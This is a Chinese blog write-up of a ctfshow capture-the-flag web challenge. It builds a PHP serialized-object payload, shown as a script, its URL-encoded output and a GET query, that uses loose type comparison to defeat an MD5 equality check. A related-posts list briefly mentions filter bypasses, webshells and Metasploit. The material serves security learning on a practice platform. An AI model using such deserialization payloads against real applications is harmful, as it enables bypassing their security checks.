CTF Show-Web-签到·好玩的PHP

原创 已于 2025-07-27 09:53:41 修改 · 368 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #网络安全 #CTF #web安全 #安全

于 2025-07-27 09:39:45 首次发布

知识点

PHP语言、序列化、反序列化

解题步骤

 代码审计,发现需要构造一个序列化的字符串绕过多个条件检查,使得反序列化后的对象满足以下条件:

        (1)$d,$s,$b三个属性值互不相同,连接成$dsb,连接后的长度<=3

        (2)$ctf的长度<=3

        (3)$dsb和$ctf不严格相等,但MD5哈希值相等

初始尝试:

        MD5强碰撞,由于长度限制不可能

        数字转为字符串长度=5,超过限制

构造方案:

        利用PHP的松散比较,使$dsb="123",$ctf=123,PHP计算MD5会先将数字转换为字符串

<?php
class ctfshow{
    private $d = '1';    //字符串"1"
    private $s = '2';  // 字符串"2"
    private $b = '3';  // 字符串"3"
    private $ctf = 123; // 整数123
}    //构造恶意对象
$obj = new ctfshow();

echo urlencode(serialize($obj));    //将序列化后的结构进行URL编码后的Payload
?>

        运行后输出:

O%3A7%3A%22ctfshow%22%3A4%3A%7Bs%3A10%3A%22%00ctfshow%00d%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22%00ctfshow%00s%22%3Bs%3A1%3A%222%22%3Bs%3A10%3A%22%00ctfshow%00b%22%3Bs%3A1%3A%223%22%3Bs%3A12%3A%22%00ctfshow%00ctf%22%3Bi%3A123%3B%7D//O%3A7%3A%22ctfshow%22%3A4%3A%7Bs%3A10%3A%22%00ctfshow%00d%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22%00ctfshow%00s%22%3Bs%3A1%3A%222%22%3Bs%3A10%3A%22%00ctfshow%00b%22%3Bs%3A1%3A%223%22%3Bs%3A12%3A%22%00ctfshow%00ctf%22%3Bi%3A123%3B%7D

 最终payload,发送GET请求:

?dsbctf=O%3A7%3A%22ctfshow%22%3A4%3A%7Bs%3A10%3A%22%00ctfshow%00d%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22%00ctfshow%00s%22%3Bs%3A1%3A%222%22%3Bs%3A10%3A%22%00ctfshow%00b%22%3Bs%3A1%3A%223%22%3Bs%3A12%3A%22%00ctfshow%00ctf%22%3Bi%3A123%3B%7D

 总结

巧妙地利用了PHP的类型转换特性,在满足所有严格条件的同时,绕过了MD5碰撞的长度限制。

ctfshow-内部赛-签到
XYH_233的博客
03-30 2170
ctfshow-内部赛-签到
ctfshow---php特性
fainpo的博客
04-02 2294
使用此管道符“|”可以将两个命令分隔开,“|”左边命令的输出就会作为“|”右边命令的输入,此命令可连续使用,第一个命令的输出会作为第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。就是比如get传入a=1第一个foreach的$key就是a,$value就是1,利用die($error) 这里退出会输出$error,所以将flag的值赋值给他就能得到flag,当然第一个if不让,所以我们利用一个跳板。_()==gettext() 是gettext()的拓展函数,开启text扩展。
ctfshow-PHP反序列化
m0_72125469的博客
09-10 1737
这几道yii框架的反序列化漏洞 虽然没让我学会原理 但是我学会了 如果遇见某一类框架漏洞 直接找入口 找到入口后 网上找现成的链子 一个一个去尝试,现在我的时间不多了只能按照教程这么思路的来一遍这种框架漏洞 具体原理目前没时间学 如果以后有时间搜索(YII链子学习反序列化) 2023/12/7 14:38图书馆记录一下链子poc1phppublic $id;//命令执行namespace{poc2yii2.2.37phppublic $id;
ctfshow单身杯2024wp
star3119391396的博客
11-25 1746
dsbctf-wp-web部分
ctfshow DSBCTF web部分wp
2301_79700060的博客
11-13 968
需要值不同而 md5 相同,有长度限制不能进行强碰撞,尝试数组绕过也不行,这里注意到可以让其类型不同而值相同进行绕过,构造 pop 链最后得到 flag。
### CTF-All-In-One 超全学习文档资料
04-13
内容概要:本文档《ctf-all-in-one.pdf》是一份全面的CTF(夺旗赛)学习指南,涵盖了CTF的基础知识、各类题型、常用工具、高级技术和实战技巧。文档首先介绍了CTF的概念及其发展历史,解释了CTF比赛的形式和规则,...
ctfhub-web-ssrf通关攻略
qq_64470109的博客
03-09 1269
题目提示我们访问本机的flag.php,那我们便去访问一下OK,出来结果。
ctfhub-web-信息泄露
joker_in_here的博客
08-13 1781
下载dvcs-ripper-master.zip-将压缩包拖到虚拟机kali桌面-解压-打开文件-在该文件目录下打开终端-输入命令sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl。切到dist目录-运用ls -al命令查看所有文件-找到刚才克隆的文件目录-切换到此目录-运行ls -al命令-发现一个后缀带txt的文件-用cat打开文件得到答案。
ctf.show-web赛题】
一纸荒芜的博客
03-21 3736
主要分享自己做题的心得和积累,共勉之。
CTFHUB -web-Git信息泄露
2301_76815548的博客
04-26 1380
注意GitHck要在python2 的环境下而开本生自带,上面的dirsearch在python3的环境下,而kail也有python3 的环境,所以用的时候要指明用python2,不然会报错。安装dirsearch---apt-get install dirsearch。先用管理员权限进行跟新------apt-get update。----.在命令行输入sudo passwd root-git reset --hard<分支名>addflag。----按照提示操作就可以设置新的root密码。
ctfshow DSBCTF-2024 misc
bayue_xiaoyu的博客
11-14 970
ctfshow{该内存镜像被采集时计算机名(区分大小写)_该内存镜像ip地址_该内存镜像系统build版本号(5位)}请问该电脑获取内存镜像是登录的QQ号码,看过的10字短剧名称,看过的bilibili视频BV号。得到主机名称 ZHUYUN_S_PC , 顺便可以把version一起看了。有很多网站,找到一串长长的,拼一下拼音知道应该就是这个网站了。首先dmp是转储文件,是系统遭受重大错误留下的内存状态文件。看过的短剧名称,可以通过https://过滤看过什么网站。找到一个大概十字的访问网站,
CTFSHOW-单身杯(WEB部分复现WP)
qq_61620566的博客
11-15 5515
CTFSHOW单身杯赛后复盘
CTFshow 菜狗杯 web方向 全
Jay17的博客
09-01 6675
CTFshow 菜狗杯 web方向 全
ctfshow【菜狗杯】wp
leekos的博客,分享web安全相关知识~
03-07 3381
ctfshow【菜狗杯】wp
ctfshow单身杯(dsb)个人wp
weixin_49436541的博客
05-23 1483
目录MISC签到没大没小的串串 MISC签到 没大没小的串串 爆 import hashlib import random def huan(zm): if ord(zm)>=65 and ord(zm)<=90: return zm.lower() if ord(zm)>=97 and ord(zm)<=122: return zm.upper() return zm flag="y0U_RE4lLy_kn0W_TH1S_Co
Dvwa靶场搭建_错误汇总
sjsn_z的博客
12-31 1172
本文介绍了网站安全基础知识和DVWA靶场搭建方法。主要内容包括: 网站安全概述:解释了为何网站成为主要攻击目标,并介绍了OWASP组织及其TOP 10安全报告 常见漏洞类型:详细列举了SQL注入、命令执行、文件上传等9种主要漏洞及其危害 DVWA靶场介绍:说明这个专门设计的漏洞练习平台的功能和价值 详细搭建步骤:提供从环境准备到最终配置的完整指南,包括PHPStudy安装、DVWA部署、数据库配置等关键环节 常见问题解决:针对数据库连接、CSRF令牌错误等问题提供解决方案 安全级别说明:解释Low到Impo
(2025最后一篇博客)Metasploit框架攻击Windows实例:三种渗透路径
Bruce_xiaowei的博客
12-31 1000
本文通过三种渗透路径演示了针对Windows系统的Metasploit攻击技术。实验环境配置了DVWA靶机(Windows 10)和Kali Linux攻击平台。首先通过Nmap扫描发现目标开放HTTP和MySQL服务,随后详细介绍了三种攻击方法:1)利用Web命令执行漏洞进行无文件攻击,通过web_delivery模块生成Python载荷;2)上传PHP WebShell建立反向连接;3)利用MySQL未授权访问漏洞进行渗透。文章包含完整的操作步骤、命令参数说明及多语言Payload示例,最后成功获取管理
序列化绕过-攻防世界-unseping
最新发布
小荷才露尖尖角,一枝红杏出墙来!
01-05 410
本文分析了一个PHP反序列化漏洞利用案例。代码中存在一个ease类,通过反序列化可触发ping方法执行系统命令。waf过滤了常见危险字符,但可通过\转义、${IFS}、八进制编码等方式绕过。给出了三种payload构造方法:1)利用${IFS}和字符串分割绕过;2)使用制表符\x09和换行符\x0a;3)直接使用find命令。最终通过POST传递base64编码的序列化对象实现命令执行,获取flag。
SRv6知识点
qq_50496467的博客
01-02 418
end-op SID主要用于ping/tracert场景,本端在发起ping/tracert的时候,在报文的目的IPv6地址字段前,插入远端的end-op SID,这样远端设备进行SRH报文头解封装之后,就解析到了end-op SID,end-op SID指示远端设备处理并应答ping/tracert报文。未配置时,系统默认使用::作为源地址,这可能影响后续报文的转发;命令【opcode ::1】,前面的::指代的就是刚才【上面】配置的locator,意思为【后面的1跟在刚才配置的locator的后面】;
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值